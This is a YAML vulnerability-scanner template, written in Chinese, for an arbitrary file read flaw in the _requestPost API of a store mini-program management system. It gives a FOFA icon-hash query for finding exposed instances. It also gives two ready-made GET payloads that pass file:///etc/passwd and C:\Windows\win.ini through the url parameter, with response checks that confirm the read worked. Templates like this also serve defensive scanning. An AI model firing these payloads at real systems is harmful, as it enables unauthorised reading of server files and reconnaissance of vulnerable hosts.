product: 万能门店小程序管理系统
vName: 万能门店小程序管理系统 requestPost接口任意文件读取
type: 访问控制
vID: [ ]
level: 3
vDesc: 万能门店小程序管理系统_requestPost接口存在任意文件读取漏洞。
version: ''
note: ''
search:
  FOFA: icon_hash="-1795757073"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247487882&idx=1&sn=538ceedb7a3754102f139f196c13d046&chksm=974b9c8da03c159b5b124c7bcecddf533abffca049257ba418b2293324c5e255d0bff24b9457&cur_album_id=2873032428486115330&scene=189#wechat_redirect
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /api/wxapps/_requestPost?data=1&url=file:///etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /api/wxapps/_requestPost?data=1&url=file://C:\Windows\win.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and